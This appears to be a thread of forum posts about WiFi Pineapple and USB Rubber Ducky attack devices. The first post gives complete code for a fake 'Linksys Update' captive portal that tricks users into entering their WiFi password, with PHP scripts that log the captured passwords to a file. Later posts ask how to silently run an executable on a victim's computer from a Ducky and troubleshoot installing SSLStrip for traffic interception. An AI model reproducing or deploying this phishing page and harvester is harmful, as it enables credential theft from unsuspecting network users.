petiepablo

So I found out that nodogsplash will not run PHP, so I had to send the post data to the root www folder, where I dropped the PHP file. From the PHP file I linked the error.HTML and update.HTML files back to the nodogsplash. Here is the code: splash.html: <!DOCTYPE html> <!--[if lt IE 7]> <html class="lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]--> <!--[if IE 7]> <html class="lt-ie9 lt-ie8" lang="en"> <![endif]--> <!--[if IE 8]> <html class="lt-ie9" lang="en"> <![endif]--> <!--[if gt IE 8]><!--> <html lang="en"> <!--<![endif]--> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title>Linksys Update</title> <!--[if lt IE 9]><script src="//html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]--> </head> <body> <!-- Main Background --> <img src="$imagesdir/linksys_bg.png" style="position: absolute; top: 0px; left: 0px" width="1280" height="800" /> <form method="post" action="http://172.16.42.1/dbconnect.php"> <p> <input type="password" name="password" id="pass1" maxlength="64" style="position: absolute; top: 395px; left: 552px; z-index: 1; width: 410px; height: 44px; color: black; border: 0px solid; outline: none; background-color: transparent; font-size: 26px;" /> </p> <p> <input type="password" name="confirm" id="pass2" maxlength="64" style="position: absolute; top: 456px; left: 552px; z-index: 1; width: 410px; height: 44px; color: black; border: 0px solid; outline: none; background-color: transparent; font-size: 26px;" /> </p> <p> <input type="image" src="$imagesdir/update.png" style="position: absolute; top: 528px; left: 670px; z-index: 1;" /> </p> </form> <form method="post" name="form2" action="$imagesdir/cancel.html"> <p> <input type="image" src="$imagesdir/cancel.png" alt="Cancel Form" style="position: absolute; top: 528px; left: 830px; z-index: 1;" /> </p> </form> </body> </html> PHP file: <?php // Receive form Post data and Saving it in variables $name = @$_POST['password']; $email = @$_POST['confirm']; // Write the name of text file where data will be store $filename = "mydata.txt"; // Marge all the variables with text in a single variable. $f_data= ' Password : '.$name.' Confirm : '.$email.' ============================================================================== '; if ($name != $email) { header("location:http://172.16.42.1:2050/images/error.html"); break; } header("location:http://172.16.42.1:2050/images/updating.html"); $file = fopen($filename, "a"); fwrite($file,$f_data); fclose($file); ?> These are the two main files. I took a template that was used in this video: and manipulated it to write to text instead of using sql. He wrote a solid splash page. Here are the files I used: https://www.dropbox.com/s/q95gvrwkim4oae5/Pineapple.zip?dl=0

I have been working on something similar to what you are/were attempting and have had the same problems with the MK5. I have not been able to test my new approach (was up late and had to call it a night), but instead of having the PHP file use SQL to write the input to a database, as the MK5 seems to have trouble utilizing SQL from a PHP, have you thought about having the PHP write to a text file? Like I said, I started working on this last night, but here is the PHP I will test later today: <?php if(isset($_POST['password']) && isset($_POST['confirm'])) { $data = $_POST['password'] . '-' . $_POST['confirm'] . "\n"; $ret = file_put_contents('/tmp/mydata.txt', $data, FILE_APPEND | LOCK_EX); if($ret === false) { die('There was an error writing this file'); } else { echo "$ret bytes written to file"; } } else { die('no post data to process'); } I will run some tests later and update. I also still haven't added a line for incorrect input (password != confirm)

Hello, I have been searching the forums, and have been playing around with the basic 'Start cmd -> Mount DUCKY drive -> execute payload' scripts. The mounting portion of the script is all done silently, however the start CMD and deploying the diskpart commands that create a lot of noise, and require the exploitee to not touch anything or it will interrupt the script. Perhaps I need to do more searching, but offhand, does anyone have a way of deploying an exe ASAP once the drive is inserted? Preferably something that will not require no action in order to deploy correctly. It doesn't even have to be deployed from the USB Ducky, I could use a GET request, I just would like to know the most silent, fast way of achieving this. Here is the script I am using: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---runexe-from-sd Thanks!

Sure, Sorry about the delay, I will get it on here later today.

HA, its an old thumb drive I found, no writing on it. Should have realized from the start it wouldnt work. I attached a picture; and yes that is a plastic jewel that doesnt even light up glued to the top, it has no significance.

So just formated the SanDisk to the EXT4 specs as per Derricks guide (just like I did my other USB drive). Popped it in and restarted the basic process of installing SSLStrip through the Pineapple Console before I tried the other methods. Worked like a charm. Didn't think the type of usb drive matter, guess it does. Thank you guys for your help though!

I am at work, but I brought the required equipment and I will be trying your ideas at lunch. I also brought a blank 8gb SanDisk to try as well, I had an idea that could be the issue. Question for jdogherman, and I apologize if this is a total n00b statement: How do I mount the USB folder to the drive on the pineapple? I have been using Putty to connect to it and not all the linux commands I know work.

After messing around with the pineapple, I am not sure its seeing my USB actually (sorry, I am new to this device), here's the info: Fstab: config global automount option from_fstab 1 option anon_mount 1 config global autoswap option from_fstab 1 option anon_swap 1 config mount option target /usb option device /dev/sda1 option fstype ext4 option options rw,sync option enabled 1 option enabled_fsck 0 config swap option device /dev/sda2 option enabled 1 My entire resources: 03:00:50 up 5 min, load average: 0.26, 0.25, 0.12 Free Memory total used free shared buffers Mem: 29524 24708 4816 0 3336 -/+ buffers: 21372 8152 Swap: 0 0 0 echo 3 > /proc/sys/vm/drop_caches Experimental Disk Usage Filesystem Size Used Available Use% Mounted on rootfs 896.0K 284.0K 612.0K 32% / /dev/root 5.3M 5.3M 0 100% /rom tmpfs 14.4M 116.0K 14.3M 1% /tmp tmpfs 512.0K 0 512.0K 0% /dev /dev/mtdblock3 896.0K 284.0K 612.0K 32% /overlay overlayfs:/overlay 896.0K 284.0K 612.0K 32% / lsusb Output Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 001 Device 002: ID 1221:3234 Processes PID USER VSZ STAT COMMAND 1 root 1500 S init 2 root 0 SW [kthreadd] 3 root 0 SW [ksoftirqd/0] 4 root 0 SW [kworker/0:0] 5 root 0 SW [kworker/u:0] 6 root 0 SW< [khelper] 7 root 0 SW [kworker/u:1] 48 root 0 SW [sync_supers] 50 root 0 SW [bdi-default] 52 root 0 SW< [kblockd] 79 root 0 SW [kswapd0] 128 root 0 SW [fsnotify_mark] 141 root 0 SW< [ath79-spi] 152 root 0 SW [mtdblock0] 157 root 0 SW [mtdblock1] 162 root 0 SW [mtdblock2] 167 root 0 SW [mtdblock3] 172 root 0 SW [mtdblock4] 177 root 0 SW [mtdblock5] 182 root 0 SW [mtdblock6] 187 root 0 SW [mtdblock7] 228 root 0 SW [kworker/0:1] 374 root 0 SW [kworker/0:2] 427 root 0 SWN [jffs2_gcd_mtd3] 429 root 0 SW [flush-mtd-unmap] 452 root 0 SW [khubd] 463 root 0 SW [scsi_eh_0] 464 root 0 SW [usb-storage] 465 root 0 SW [kworker/u:2] 484 root 1536 S {rcS} /bin/sh /etc/init.d/rcS S boot 485 root 1500 S init 487 root 1492 S logger -s -p 6 -t sysinit 519 root 0 SW< [cfg80211] 550 root 0 SW< [rpciod] 557 root 0 SW< [nfsiod] 625 root 1504 S /sbin/syslogd -C16 627 root 1484 S /sbin/klogd 629 root 860 S /sbin/hotplug2 --override --persistent --set-rules-f 635 root 860 S /sbin/ubusd 1296 nobody 788 S /usr/sbin/atd 1313 root 1508 S /usr/sbin/crond -c /etc/crontabs -l 5 1346 root 1152 S /usr/sbin/dropbear -P /var/run/dropbear.1.pid -p 22 1382 root 1068 S /usr/sbin/uhttpd -f -h /www -r Pineapple -c /etc/con 1452 root 1496 S /sbin/watchdog -t 5 /dev/watchdog 1586 root 1496 S /sbin/udhcpc -t 0 -i eth1 -b -p /var/run/dhcp-eth1.p 1635 root 0 SW [kworker/0:3] 1693 nobody 936 S /usr/sbin/dnsmasq -C /var/etc/dnsmasq.conf 1798 root 1452 S hostapd -dd /var/run/hostapd-phy0.conf 2049 root 1496 S /usr/sbin/ntpd -n -p 3.openwrt.pool.ntp.org 2141 root 1492 S {exe} ash /www/pineapple/ssh/ssh-connect.sh 2144 root 788 S autossh -M 20000 -N -R 4255:localhost:22 root@exampl 2146 root 1148 S /usr/bin/ssh -L 20000:127.0.0.1:20000 -R 20000:127.0 2153 root 4100 S /usr/bin/php /www/pineapple/index.php 2162 root 1496 S sh -c ps 2163 root 1492 R ps

Just received the Pineapple Mark IV, I have been trying to install SSLStrip via the console, every time I try to do it, it says "installing" but when it finishes, it continues to say not installed. From the command prompt after doing an: opkg update opkg --dest usb install sslstrip I get: root@Pineapple:~# opkg --dest usb install sslstrip Installing sslstrip (0.7-1) to usb... Downloading http://downloads.openwrt.org/snapshots/trunk/ar71xx/packages/sslstrip_0.7-1_ar71xx.ipk. Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest. Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest. Installing python (2.7.3-1) to usb... Collected errors: * verify_pkg_installable: Only have 624kb available on filesystem /usb/, pkg python needs 1888 * opkg_install_cmd: Cannot install package sslstrip. ** I have an 8gb thumb drive i'm using for the pineapple, and I followed the instructions on formating EXT4 Here's a play by play when trying to install through the pineapple bar: http://imgur.com/a/BZvu6 Notice I install, it only initially gives me the option to install to internal storage. After initial install, it then gives me the option to install to USB, once I select "install to USB" it returns to the initial option screen